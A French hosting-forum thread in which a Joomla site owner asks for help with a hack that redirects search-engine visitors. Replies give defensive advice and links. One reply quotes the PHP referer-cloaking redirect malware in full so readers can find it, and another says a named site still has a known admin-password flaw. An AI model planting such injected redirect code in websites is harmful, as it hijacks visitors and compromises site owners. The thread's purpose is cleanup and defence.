gm-crea Posté 9 Janvier 2012 Partager Posté 9 Janvier 2012 Bonjour, Mon site internet créé sur Joomla a été piraté mais je ne trouve pas ou est le code malveillant. Mon site est http://www.quermaurelle.com Lorsque l'on accède directement au site par l'url tout fonctionne bien, mais lorsque l'on passe par les moteurs de recherche il y a une redirection. Est ce que quelqu'un pourrait m'aider ou me donner le nom d'une entreprise qui pourrait le faire. Merci de vos réponses. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Nicolas Posté 9 Janvier 2012 Partager Posté 9 Janvier 2012 Bonjour, Tu as eu une injection du code qui fait la redirection. Il faut que tu regardes dans tes templates, fichiers et repertoires qui sont accessibles en ecritures (777), base de données, ... Le problème c'est que ce type de code est souvent crypté donc il est impossible de trouver une chaine de caractere (par exemple l'url destination). Commence par le template... il y a p-e un code JS quelque part dans le template. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Cariboo Posté 9 Janvier 2012 Partager Posté 9 Janvier 2012 recherche un code dans tes scripts qui ressemble à ça : error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: [l'adresse du site de destination que je ne mentionne pas exprès]"); exit(); } } } } Il y'a un "cloaking", seuls les moteurs de recherche voient la redirection, c'est ce qui empêche la détection du problème !! Lien vers le commentaire Partager sur d’autres sites More sharing options...
yuston Posté 9 Janvier 2012 Partager Posté 9 Janvier 2012 Et on peut regarder les dates des dernières modifications des fichiers. S'il y a un fichier modifié très récemment, il est probablement incriminé. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Lutin Jaune Posté 27 Janvier 2012 Partager Posté 27 Janvier 2012 (modifié) Bonjour, je viens de me faire hacker le serveur je pense que l'attaque venait par les sites joomla Dan a remis mon serveur à plat, merci Dan, merci Arlette, voici les infos trouvées suite à ma mésaventure. je voudrais mettre en garde ceux à qui ca pourrait arriver />http://www.tux-planet.fr/faille-de-securite-dans-joomla-15x-remote-admin-password-change/ URGENT!! mettre à jour vos sites joomla en 2.5 je viens de tester sur le site le quermaurelle, la faille est présente, un formulaire apparait (je n'ai pas été plus loin) autre info trouvée, concernant DirectAdmin, voici les erreurs (de débutant que j'ai faites) à ne pas commettre:/>http://www.edelweisshosting.net/index.php?topic=4380.0 à part pour les skins (suis pas féru des skins) et pour "sécuriser" autant que faire se peut... un site Joomla voici quelques conseils simples et concis à respecter/>http://www.revue-hebergement-web.com/tutoriel/joomla/securiser-joomla.php/>http://www.support-joomla.com/administration/securite et en dernier recours, y'a aussi ça:/>http://www.shantee.net/comment-changer-le-nom-du-repertoire-qadministratorq-pour-plus-de-securite-avec-joomla.html *edit je réinstalle mes sites (mis à jour) petit à petit, je m'inquiète de savoir si dans mes sources joomla je n'ai pas embarqué une infection, certains sites étant des upgrades d'upgrade et je conseille ce post: http://forum.ovh.com/showthread.php?t=49433 qui traite des infections par iframe et pour sécuriser encore plus un site joomla ou autre CMS d'ailleurs. Bonjour, Mon site internet créé sur Joomla a été piraté mais je ne trouve pas ou est le code malveillant. Mon site est http://www.quermaurelle.com Lorsque l'on accède directement au site par l'url tout fonctionne bien, mais lorsque l'on passe par les moteurs de recherche il y a une redirection. Est ce que quelqu'un pourrait m'aider ou me donner le nom d'une entreprise qui pourrait le faire. Merci de vos réponses. Modifié 29 Janvier 2012 par Lutin Jaune Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dan Posté 27 Janvier 2012 Partager Posté 27 Janvier 2012 autre info trouvée, concernant DirectAdmin, voici les erreurs (de débutant que j'ai faites) à ne pas commettre:/>http://www.edelweisshosting.net/index.php?topic=4380.0 à part pour les skins (suis pas féru des skins) Leur conseil pour l'utilisation du skin "anglais" est correct, sauf si, comme dans le cas des serveurs que j'installe, une traduction française A JOUR est disponible (ou du moins a été développée et tenue à jour) Toutes les fonctionnalités sont donc accessibles, même avec le skin en langue française. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Lutin Jaune Posté 27 Janvier 2012 Partager Posté 27 Janvier 2012 je ne disais pas que l'histoire du skins était fausse, je disais juste que j'avais pas commis cette erreur puisque j'utilise toujours des skins garantis d'origine. (3 erreurs sur 4 c'était déjà pas mal) Merci Dan, Leur conseil pour l'utilisation du skin "anglais" est correct, sauf si, comme dans le cas des serveurs que j'installe, une traduction française A JOUR est disponible (ou du moins a été développée et tenue à jour) Toutes les fonctionnalités sont donc accessibles, même avec le skin en langue française. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Sujets conseillés
Veuillez vous connecter pour commenter
Vous pourrez laisser un commentaire après vous êtes connecté.
Connectez-vous maintenant